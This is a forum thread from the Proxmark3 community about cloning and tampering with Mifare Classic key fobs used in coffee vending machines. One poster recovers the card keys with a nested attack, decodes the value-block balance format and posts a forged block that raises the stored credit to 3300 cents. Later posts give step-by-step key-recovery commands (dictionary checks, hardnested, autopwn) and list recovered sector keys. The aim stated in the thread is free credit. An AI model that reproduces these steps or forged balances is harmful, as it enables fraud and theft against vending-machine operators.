Mifare classic 4k - Having fun with Coffe vending machines

chimera · 2018-10-26 18:31:38

Hello,

I already successfully cloned a Mifare classic 4k key tag from a coffee vending machine, clone verified, works without any issues
Now I would like to investigate on a more elegant way:
Now with having the original card keys, is it possible to modify the original tag to prevent the reader to reduce the remaining units on the tag?

What modifications would be required to get this done?

Thanks a lot in advance
Chimera

Below information is from original Mifare classic 4 k key tag

proxmark3> hf 14a info
 UID : ff ff ff ff           
ATQA : 00 02          
 SAK : 18 [2]          
TYPE : NXP MIFARE Classic 4k | Plus 4k SL1          
proprietary non iso14443-4 card found, RATS not supported          
No chinese magic backdoor command detected          
Prng detection: WEAK

proxmark3> hf mf nested 4 0 A FFFFFFFFFFFF
--nested. sectors:40, block no:  0, key type:A, eml:n, dmp=n checktimeout=471 us          
Testing known keys. Sector count=40          
nested...          
-----------------------------------------------          
uid:xxxxxx trgbl=4 trgkey=0          
Found valid key:xxxxxxxxx          
-----------------------------------------------          
uid:xxxxxxx trgbl=4 trgkey=1          
Found valid key:xxxxxxxxxxx         


-----------------------------------------------
Nested statistic:
Iterations count: 2          
Time in nested: 3.921 (1.960 sec per key)          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  xxxxxxxxxxx  | 1 |  xxxxxxxxxxxxx  | 1 |          
|002|  xxxxxxxxxxx  | 1 |  xxxxxxxxxxx  | 1 |          
|003|  xxxxxxxxxxxx  | 1 |  xxxxxxxxxxxx  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|016|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|017|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|018|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|019|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|020|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|021|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|022|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|023|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|024|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|025|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|026|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|027|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|028|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|029|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|030|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|031|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|032|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|033|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|034|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|035|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|036|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|037|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|038|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|039|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---

Last edited by chimera (2018-11-22 19:47:41)

chimera · 2018-10-26 21:25:21

regarding this topic I just found a good starting point

http://esec-pentest.sogeti.com/posts/20 … offee.html

chimera · 2018-10-30 23:41:08

Did not take much time Mission accomplished, now I am able to modify existing keytag to put any amount onto it.
It took me 4 dumps to understand the way how data gets written, see details below

a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe --> 160 cents
d2 00 00 00 2d ff ff ff d2 00 00 00 01 fe 01 fe --> 210 cents
04 01 00 00 fb fe ff ff 04 01 00 00 01 fe 01 fe --> 260 cents
68 01 00 00 97 fe ff ff 68 01 00 00 01 fe 01 fe --> 360 cents

Manufacturer is storing current balance incl. a checksum check, but a simple check

Here is my puzzle for you --> Whats the correct string for 3300 cents?
Have fun

Last edited by chimera (2018-10-30 23:42:17)

iceman · 2018-10-31 09:28:44

Looks like a value block...

Make a lua script for it And automate the process

chimera · 2018-10-31 18:58:17

Hello Iceman

Thanks a lot for your reply!
To be honest, I have no clue what a "lua script" is and how it can help to solve this puzzle. Maybe you can provide me some additional information on this, would like to take a look at this and learn something

I would like to share my approach to solve this, maybe someone can used it in the future as well.
Ok, as mentioned above I had this Mifare 4k classic keytag, same information was stored in block 5 and 6, beside this nothing else was stored, of course beside block 0,but does not matter.

a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe --> 160 cents
d2 00 00 00 2d ff ff ff d2 00 00 00 01 fe 01 fe --> 210 cents
04 01 00 00 fb fe ff ff 04 01 00 00 01 fe 01 fe --> 260 cents
68 01 00 00 97 fe ff ff 68 01 00 00 01 fe 01 fe --> 360 cents

By looking at each string I saw that the first 4 words were used to store the "current balance"
e.g a0 00 00 00
Following 4 words are reserved to store a checksum
e.g 5f ff ff ff
then again 4 words again reserved to write current balance again
e.g a0 00 00 00
for the last 4 words I have no clue, but does not matter because they never change
e.g 01 fe 01 fe

Current Balance:
a0 --> equals in decimal to 160 cents
d2 --> equals in decimal to 210 cents
04 01 -->does not match to 260 because it is 01 04 --> Looks like when 2 words are used balance gets stored reversed
68 01 --> Proofed with 4th dump, balance with 2 words gets stored in reversed order (360 equals to 01 68)

so far so good, now let us take a look to the checksum check:
E.g. the 160 cent dump --> a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe
Question is how the "5f ff ff ff" string gets calculated.....first I tried to recalculate to dezimal to find any logic to calculate this, but no luck.....
The I just look again to all 4 dumps and concluded following:
a "00" in the current balance always resulted in the checksum to a "ff"
a "01" in the current balance always resulted in the checksum to a "fe"

I thought maybe a sort of lookup table is used to generate the checksum. In excel I put in the first row 255 Hex numbers from 00 --> FF
In the second row again, but this time I reversed it to top side down

Like this:
0 FF
1 FE
2 FD
3 FC
.....

In the beginning I thought great I solved it because when referring to the lookup table:
a0 equals with 5f - same for d2 equals for 2d --> but it did not work anymore on the 4th dump 68 did not match with 97

then I solved it

Approach with the reversed lookup table was correct, but words do not get replaced 1:1, it works like this:
e.g 160 cent dump --> a0 --> check in lookup table for first byte, it is "a" or 0a results in lookup table to --> F5
remaining byte is "0" or 00, equals in lookup table to --> ff
--> Now we simply take the 2nd byte of each lookup table crossreference to build the checksum value, it is --> 5F (2nd byte - F5 and FF)

Please verify on your own, perfectly works for each example

Now we are able to build the correct Hex string to change the current balance for example to --> 3300 cents

e4 0c 00 00 1b f3 ff ff e4 0c 00 00 01 fe 01 fe

Successfully verified, works like a charm

iceman · 2018-10-31 19:07:02

...how about you look up the definition of a value block in a mifare classic datasheet, I think that will help you out

chimera · 2018-10-31 20:11:57

Referring to the datasheet:
byte number 0-11 stores values
12-15 is reserved for the adress --> for my example --> 01 fe 01 fe

When you analyze a Mifare classic keytag, which approach do you use to find out how current balance gets written?

Thanks
Chimera

iceman · 2018-11-01 04:11:11

almost there, read how the values are stored in a value block...

chimera · 2018-11-01 12:46:47

Hello Iceman,

Did refer again to the Mifare classic datasheet, now value block defintion is clear to me

Out of the datasheet:
"An example of a valid value block format for the decimal value 1234567d and the block address 17d is shown in Table 4. First, the decimal value has to be converted to the hexadecimal representation of 0012D687h. The LSByte of the hexadecimal value is stored in Byte 0, the MSByte in Byte 3. The bit inverted hexadecimal ärepresentation of the value is FFED2978h where the LSByte is stored in Byte 4 and the MSByte in Byte 7."

LSByte = byte most right
MSByte = byte most left
Also, key message is "bit inverted"

To sum this up:
Basically I came to the same conclusion with my analysis, but it took me 4 dumps to understand it somehow.
It's much smarter and faster to study the datasheet in advance

Thanks
Chimera

iceman · 2018-11-01 12:59:06

You did learn something new and you was curious. Excellent!

David_1 · 2023-08-29 11:42:17

Is the OP still active, im on same quest to copy vending key, looking for what i can buy to fit in vending machine?
anyone suggests a suitable rfid chip that fits same slot as mizip key hole
thanks

David_1 · 2023-09-15 17:36:05

so I have two green keys both give out something ?
with

[usb] pm3 --> hf search
[|] Searching for ISO14443-A tag...
[+]  UID: 86 91 CC xx
[+] ATQA: 00 04
[+]  SAK: 09 [2]
[+] Possible types:
[+]    MIFARE Mini 0.3K
[=] proprietary non iso14443-4 card found, RATS not supported


[+] Valid ISO 14443-A tag found

but what is next to dump or clone the green key
Thanks

David_1 · 2023-09-15 17:58:31

these commands did reply with something ? do i need more or how do i write them ?

hf mf chk
hf mf mad
hf mf list

i have these to write to
10pcs CUID Android App MCT Modify UID Changeable NFC 1k s50 13.56MHz Keyfob Block 0 Writable 14443A
green

Last edited by David_1 (2023-09-15 18:00:33)

fazer · 2023-09-16 18:23:43

Good evening David_1, hf mf -h depending on what you want to do with this key.
You need a complete dump to be able to clone it.
You must also look at the data sheet of this transponder to have the correct chip reference.
Because IC S50 not the same memory as IC S20

Last edited by fazer (2023-09-16 18:33:53)

David_1 · 2023-09-17 08:11:58

thanks for that I have found part of my problem I installed into my docs on windows,,, I think long path or spaces in path...
So then after following this ;-
https://www.youtube.com/watch?v=o6WOTM4D970

now I get it to dump files.. Bins so I can see the data
Strange thing is I have been issued a key for free coffee my plan to copy it is purely a test to see if I can.. my copy will gain me nothing but maybe more knowledge

fazer · 2023-09-17 09:56:35

Hello, have you managed to obtain a complete dump of this key.
Good day.

David_1 · 2023-09-17 22:29:29

frazer ... my dump Bin file seems to stat at zero and finish at 0208 .... 89 0A 4B 79 1B EA 7B CC I am not sure how big a complete dump is can you help ?

i used this command 'hf mf autopwn' what should I use to get a good file ?

Last edited by David_1 (2023-09-17 22:31:31)

fazer · 2023-09-18 08:40:55

Hello, I would like to try to help you, there are dictionaries to test.
hf mf chk -h to start see if a key can come out, then with this key try a hardnested attack. Now yes hf mf autopwn can do the job. hf mf autopwn --1k -s 0 -a -k FFFFFFFFFFFF -f mfc_default_keys here is an example. Try using the --help of each command there are examples.
Good day.

David_1 · 2023-09-18 09:28:43

I did 6 dumps last night, most are similar... but not identical. can I PM you my email ? and send them to you ? or you email me please

Last edited by David_1 (2023-09-18 09:30:04)

David_1 · 2023-09-18 11:05:03

[usb] pm3 --> hf mf chk
[=] Start check for keys...
[=] .................................
[=] time in checkkeys 8 seconds

[=] testing to read key B...
[=] Sector: 0, First block: 0, Last block: 3, Num of blocks: 4
[=] Reading sector trailer

[+] found keys:

[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | 1 | ------------ | 0
[+]  001 | 007 | ------------ | 0 | ------------ | 0
[+]  002 | 011 | ------------ | 0 | ------------ | 0
[+]  003 | 015 | ------------ | 0 | ------------ | 0
[+]  004 | 019 | ------------ | 0 | ------------ | 0
[+]  005 | 023 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  006 | 027 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  007 | 031 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  008 | 035 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  009 | 039 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  010 | 043 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  011 | 047 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  012 | 051 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  013 | 055 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  014 | 059 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+]  015 | 063 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details

fazer · 2023-09-18 15:20:51

Re, it's a good start you now have what you need to do a hardnested attack or hf mf autopwn --1k -s 0 -a -k A0A1A2A3A4A5 -f mfc_default_keys for example. Concerning the exchange of emails why not continue here like that if a person who wants to can also help if they want to.

there is something strange in this dump because normally the mini has 5 sectors4 blocks/sector16 bytes/block = 320 bytes.
does your pm3 have the latest update? <<hw version>>

Last edited by fazer (2023-09-18 15:51:36)

David_1 · 2023-09-18 16:57:50

yes I think iceman got updated last week
mine was done yesterday

David_1 · 2023-09-18 19:44:47

[usb] pm3 --> hf mf csetuid --u 8691CCB4 --atqa 0004 --sak 09
[#] wupC1 error
[=] couldn't get old data. Will write over the last bytes of block 0
[+] new block 0... 8691CCB46F0904000000000000000000
[#] wupC1 error
[!!] Can't set UID. error -1

whats up with that ?

fazer · 2023-09-19 10:56:09

Hello, look here you will undoubtedly find your answer.

https://github.com/RfidResearchGroup/pr … s_notes.md

fazer · 2023-09-20 17:50:58

good evening, try this cmd to try to get out the missing keys.
hf mf hardnested --blk 3 -a -k A0A1A2A3A4A5 --tblk 3 --tb # for key B of blk 3.
If ok, do the same for the rest.
of course with the badge on pm3.

Last edited by fazer (2023-09-20 17:52:37)

David_1 · 2023-09-24 22:04:51

sorry got distracted on another mission lol
newcard

[usb] pm3 --> hf mf rdsc -k a0a1a2a3a4a5 -s 0 -v

[=]   # | sector 00 / 0x00                                | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 86 91 CC B4 6F 89 04 00 C8 39 00 20 00 00 00 19 | ....o....9. ....
[=]   1 | 62 00 48 88 49 88 4A 88 4B 88 00 00 00 00 00 00 | b.H.I.J.K.......
[=]   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]   3 | 00 00 00 00 00 00 78 77 88 C1 00 00 00 00 00 00 | ......xw........

[=] -------------------------- Sector trailer decoder --------------------------
[=] key A........ 000000000000
[=] acr.......... 787788
[=] user / gpb... c1
[=] key B........ 000000000000
[=]
[=]   # | access rights
[=] ----+-----------------------------------------------------------------------
[=]   0 | read AB; write B
[=]   1 | read AB; write B
[=]   2 | read AB; write B
[=]   3 | write A by B; read ACCESS by AB; write ACCESS by B; write B by B
[=] ----------------------------------------------------------------------------


[usb] pm3 -->

this a new problem but with same bought writable cards, but i do not seem able to write  sector zero
[usb] pm3 -->  hf mf cload -f hf-mf-C459346E-dump-001.eml
[+] loaded 1024 bytes from text file `hf-mf-C459346E-dump-001.eml`
[=] Copying to magic gen1a card
[=] .[#] wupC1 error
[!] Can't set magic card block: 0
[usb] pm3 --> hf mf cload --emu
[=] Start upload to emulator memory
[=] .[#] wupC1 error
[!] Can't set magic card block: 0

anyone help ?

iceman · 2023-10-01 08:40:27

tried?

hf mf mad

David_1 · 2023-10-01 11:43:09

iceman wrote:

tried?
hf mf mad

thank you will try later, i killed my fist card today,
with this command trying to write block 0 for a test
hf mf wrbl --force --blk 0 -d 000102030405060708090a0b0c0d0e0f

can it be recovered ?

fazer · 2023-10-02 07:14:01

Hello, you say I killed my first card, what type of card & why this blk--0 command for testing?, I don't really understand what you want to clone a card, so started with uid & set the rest. Now get it back maybe to see what type of card.

David_1 · 2023-10-02 09:49:13

fazer wrote:

Hello, you say I killed my first card, what type of card & why this blk--0 command for testing?, I don't really understand what you want to clone a card, so started with uid & set the rest. Now get it back maybe to see what type of card.

sorry the card I killed is the one im am trying to make the same as the original..

10pcs CUID Android App MCT Modify UID Changeable NFC 1k s50 13.56MHz Keyfob Block 0 Writable 14443A
3 Sold
￡4.32 / lot (10 Pieces)

43 pence lol its not a big value item but its now not readable or writable, just wondered if there was another comand to reset it before it goes in the bin...

Last edited by David_1 (2023-10-02 09:50:07)

fazer · 2023-10-02 10:20:29

Higher up in your hf search it tells you MIFARE Mini 0.3K
[=] proprietary non iso14443-4 card found, RATS not supported
So if I understand correctly you are trying to clone this card with
UID Changeable NFC 1k s50, it's not at all the same memory so the problem may come from there

David_1 · 2023-10-08 21:29:06

sorry been waiting for post from China

Proxmark3 community

Announcement

#1 2018-10-26 18:31:38

Mifare classic 4k - Having fun with Coffe vending machines

#2 2018-10-26 21:25:21

Re: Mifare classic 4k - Having fun with Coffe vending machines

#3 2018-10-30 23:41:08

Re: Mifare classic 4k - Having fun with Coffe vending machines

#4 2018-10-31 09:28:44

Re: Mifare classic 4k - Having fun with Coffe vending machines

#5 2018-10-31 18:58:17

Re: Mifare classic 4k - Having fun with Coffe vending machines

#6 2018-10-31 19:07:02

Re: Mifare classic 4k - Having fun with Coffe vending machines

#7 2018-10-31 20:11:57

Re: Mifare classic 4k - Having fun with Coffe vending machines

#8 2018-11-01 04:11:11

Re: Mifare classic 4k - Having fun with Coffe vending machines

#9 2018-11-01 12:46:47

Re: Mifare classic 4k - Having fun with Coffe vending machines

#10 2018-11-01 12:59:06

Re: Mifare classic 4k - Having fun with Coffe vending machines

#11 2023-08-29 11:42:17

Re: Mifare classic 4k - Having fun with Coffe vending machines

#12 2023-09-15 17:36:05

Re: Mifare classic 4k - Having fun with Coffe vending machines

#13 2023-09-15 17:58:31

Re: Mifare classic 4k - Having fun with Coffe vending machines

#14 2023-09-16 18:23:43

Re: Mifare classic 4k - Having fun with Coffe vending machines

#15 2023-09-17 08:11:58

Re: Mifare classic 4k - Having fun with Coffe vending machines

#16 2023-09-17 09:56:35

Re: Mifare classic 4k - Having fun with Coffe vending machines

#17 2023-09-17 22:29:29

Re: Mifare classic 4k - Having fun with Coffe vending machines

#18 2023-09-18 08:40:55

Re: Mifare classic 4k - Having fun with Coffe vending machines

#19 2023-09-18 09:28:43

Re: Mifare classic 4k - Having fun with Coffe vending machines

#20 2023-09-18 11:05:03

Re: Mifare classic 4k - Having fun with Coffe vending machines

#21 2023-09-18 15:20:51

Re: Mifare classic 4k - Having fun with Coffe vending machines

#22 2023-09-18 16:57:50

Re: Mifare classic 4k - Having fun with Coffe vending machines

#23 2023-09-18 19:44:47

Re: Mifare classic 4k - Having fun with Coffe vending machines

#24 2023-09-19 10:56:09

Re: Mifare classic 4k - Having fun with Coffe vending machines

#25 2023-09-20 17:50:58

Re: Mifare classic 4k - Having fun with Coffe vending machines

#26 2023-09-24 22:04:51

Re: Mifare classic 4k - Having fun with Coffe vending machines

#27 2023-10-01 08:40:27

Re: Mifare classic 4k - Having fun with Coffe vending machines

#28 2023-10-01 11:43:09

Re: Mifare classic 4k - Having fun with Coffe vending machines

#29 2023-10-02 07:14:01

Re: Mifare classic 4k - Having fun with Coffe vending machines

#30 2023-10-02 09:49:13

Re: Mifare classic 4k - Having fun with Coffe vending machines

#31 2023-10-02 10:20:29

Re: Mifare classic 4k - Having fun with Coffe vending machines

#32 2023-10-08 21:29:06

Re: Mifare classic 4k - Having fun with Coffe vending machines

Board footer